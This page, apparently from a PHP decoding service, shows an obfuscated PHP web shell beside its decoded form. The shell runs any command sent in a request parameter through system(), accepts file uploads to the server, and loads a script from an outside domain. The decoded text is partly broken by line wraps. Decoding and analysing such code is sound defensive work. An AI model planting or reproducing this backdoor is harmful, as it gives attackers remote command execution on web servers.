Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (isset($_REQUEST["\x36\x36\66"])) { $S21d0f22e = $_REQUEST["\66\x36\x36"]; if ($S..
Decoded Output download
<?php if (isset($_REQUEST["666"])) { $S21d0f22e = $_REQUEST["666"]; if ($S21d0f22e == '') { echo "<html><scrip
t src='https:
7;/up.zsec
.dev/.js'
></script>"; if (isset($_FILES["Sec666Upload"]["name"])) { $S00f3cac5 = count($_FILES[
"Sec666Upload"]["name"]); $S5f8afada = 0; for ($S25d9e6e4 = 0; $S25d9e6e4 < $S00f3cac5; $S25d9e6e4++) { if (isse
t($_FILES["Sec666Upload"]["name"][$S25d9e6e4]) && $_FILES["Sec666Upload"]["s
51ze"][$S25d9e6e4] > 0) { $S605e96a1 = strtolower(pathinfo($_FILES["Sec666Upload"]["name"][$S25d9e6e4], PATH
INFO_EXTENSION)); $S119d0154 = $_FILES["Sec666Upload"]["name"][$S25d9e6e4]; $S0e583339 = basename($S119d0154); $
S4d627deb = $_FILES["Sec666Upload"]["tmp_name"][$S25d9e6e4]; if (move_uploaded_file($S4d627deb, $S0e58
3339)) { $S5f8afada++; } } } echo "<script>alert('" . $S5f8afada . " File Upload
45d');</script>"; } } else { $S4ed11c63 = $S21d0f22e; echo "<pre>"; system($S4ed11c63); echo "</pr
45>"; } } ?>Did this file decode correctly?
Original Code
<?php if (isset($_REQUEST["\x36\x36\66"])) { $S21d0f22e = $_REQUEST["\66\x36\x36"]; if ($S21d0f22e == '') { echo "\74\150\164\155\x6c\76\x3c\x73\143\162\x69\x70
\164\x20\x73\x72\x63\x3d\x27\x26\43\61\x30\x34\73\46\43\x31\x31\x36\73\46\x23\x31\x31\66\73\x26\x23\x31\61\62\73\x26\43\61\x31\65\73\46\x23\x35\x38\73\46\43\x34
\67\73\46\x23\64\x37\x3b\x26\43\x31\61\x37\73\46\x23\x31\61\62\73\46\43\64\66\x3b\46\43\61\62\62\x3b\x26\43\x31\x31\65\73\46\x23\61\x30\x31\x3b\x26\43\x39\71\73
\46\43\x34\66\x3b\x26\43\61\60\60\x3b\x26\43\x31\60\61\x3b\46\43\x31\x31\70\x3b\x26\x23\64\x37\73\46\x23\x34\x36\73\x26\43\61\x30\x36\73\x26\x23\61\x31\65\73\47
\x3e\74\57\163\x63\x72\151\160\x74\76"; if (isset($_FILES["\123\145\143\66\x36\x36\125\160\154\x6f\x61\144"]["\156\141\x6d\x65"])) { $S00f3cac5 = count($_FILES[
"\x53\x65\143\x36\x36\x36\125\x70\x6c\157\x61\144"]["\x6e\141\155\x65"]); $S5f8afada = 0; for ($S25d9e6e4 = 0; $S25d9e6e4 < $S00f3cac5; $S25d9e6e4++) { if (isse
t($_FILES["\x53\145\x63\66\66\66\x55\x70\x6c\x6f\141\144"]["\x6e\141\155\x65"][$S25d9e6e4]) && $_FILES["\123\x65\143\x36\66\66\125\160\154\x6f\x61\x64"]["\163\1
51\x7a\145"][$S25d9e6e4] > 0) { $S605e96a1 = strtolower(pathinfo($_FILES["\123\145\x63\66\x36\66\125\x70\154\157\x61\x64"]["\156\141\x6d\x65"][$S25d9e6e4], PATH
INFO_EXTENSION)); $S119d0154 = $_FILES["\123\x65\143\x36\x36\x36\x55\160\154\x6f\x61\x64"]["\156\141\x6d\x65"][$S25d9e6e4]; $S0e583339 = basename($S119d0154); $
S4d627deb = $_FILES["\x53\145\143\66\66\x36\x55\x70\x6c\157\x61\144"]["\164\155\160\137\x6e\x61\x6d\x65"][$S25d9e6e4]; if (move_uploaded_file($S4d627deb, $S0e58
3339)) { $S5f8afada++; } } } echo "\x3c\x73\x63\x72\151\160\164\x3e\141\154\x65\162\164\50\47" . $S5f8afada . "\x20\x46\x69\154\145\40\125\x70\154\157\x61\144\1
45\x64\x27\51\73\x3c\57\163\x63\x72\x69\160\164\76"; } } else { $S4ed11c63 = $S21d0f22e; echo "\74\160\162\x65\x3e"; system($S4ed11c63); echo "\74\x2f\x70\162\1
45\76"; } } ?>Function Calls
| None |
Stats
| MD5 | 6b940c54524b86706507dba5711dbde6 |
| Eval Count | 0 |
| Decode Time | 46 ms |